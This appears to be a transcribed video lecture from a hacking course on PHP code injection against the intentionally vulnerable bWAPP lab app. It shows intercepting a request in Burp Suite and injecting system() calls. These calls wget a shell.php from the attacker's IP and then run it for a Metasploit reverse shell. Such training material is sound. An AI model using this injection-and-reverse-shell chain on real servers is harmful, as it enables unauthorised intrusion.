Hello everybody and welcome back. And now, before we continue to the next tutorial, where I will actually show you some of the exploits that you can run on Metasploitable, let me just show you real quick what PHP code injection is. Now, it is very similar to the previous lecture where we covered the OS command injection, but right now, let us open the same page. So it is located on the BWAP on our OS virtual machine. Go right here and find the PHP code injection. Once you click on that, click here on hack. And here you have a simple page which basically just says this is just a test page reflecting back your message. So if we just type here message or just click on the message, it will say test. If we click on the message once again, it will once again say test. Now, you might be asking yourself, well, there isn't any input right here which we can input our code. Well, that's true, but if we actually try to intercept this with our burp suit, so open up your burp suit and click here on the intercept on. We want to have the intercept on, and once again, if you click here on the message, it will show us a packet that we sent to the web server. Now, it looks very normal until you notice that there is actually a user input right here. So this is not something that you have a form to input on the website, but if you intercept the packet, you can actually input it right here. So what I mean by that, right now, since this is a PHP code injection, we need to use a function system and then open up your brackets and then let's type pwd, which is print working directory. So we just type that right here. So system pwd, that is a function that we will print our working directory. And we forward this packet, you will see that we no longer get the test as a result, but we get the current working directory of that virtual machine, or basically of our OS virtual machine. And just like that, we can now know that the server is vulnerable to the PHP code injection. So what we can do from there, we can actually perform the same type of the attack as we performed in the previous video. So I will show you. If we click on the message once again and intercept the next packet, you can actually just download the shell.php the same way we downloaded from the previous video. So what you would do, but in this case you would do system first and then open up your brackets and then type the same command, so wget 192.168.1.15, or basically here you would specify your own IP address, since if you're running, of course, Apache on your Kali Linux machine, if you're running Apache 2 on some other machine, you would specify the IP address of that other machine that is hosting the Apache 2 with our shell.php file. And you also need to add slash shell.php, so it knows which file to download from there, and only what you need to do from there is close the quotes and then close the brackets. Once you do that, you just need to forward this packet, and this packet, and this basically will, let us just turn the intercept off, and what this will do is it will basically download the shell.php to the target machine as it did in the previous video. So right now, if I just tap here ls once again and I go right here and then system open brackets ls close quotes close brackets, and then I forward it as same in the previous video. Right now, if I go right here, we should be able to find the shell.php file. So here it is right here. We can see that we successfully uploaded the shell.php onto our target web server. And right now, what you would do is basically just click on the message once again, and what you would do is type here system, and then the next thing you would do is basically PHP, so PHP minus F and then shell.php. You would close the quotes, close the brackets, and then you would forward this packet as well. Now, this, what this will do, this will basically, so let me just close this, this will basically connect to our own listening machine, which is our Kali Linux machine, and it will prompt us with a Metasploit shell. Now, it won't connect since I didn't really open up my Metasploit framework and didn't specify the L-host and L-port and that exploit multi-handler that we did in the previous video, so it really won't connect anywhere at the moment, but I just wanted to show you the exact same process that we did in the previous video, just with the PHP code injection. If you want to try to exploit it, you can do what I said with this, but before you run the program itself, with the last command, which was the php -f and then the shell.php, you want to specify this listener in our Metasploit framework. Now, specifying the listener is the same as in the previous video, so I will not be covering that at the moment. Now, in the next video, what I will show you is how you can actually use some of the attacks and exploit Metasploitable. Since I can't really run Metasploitable, I will only show you the process to get to exploit it. I will not be really exploiting it since it doesn't work here. And I hope you enjoyed this tutorial, and I hope I see you in the next one. Bye!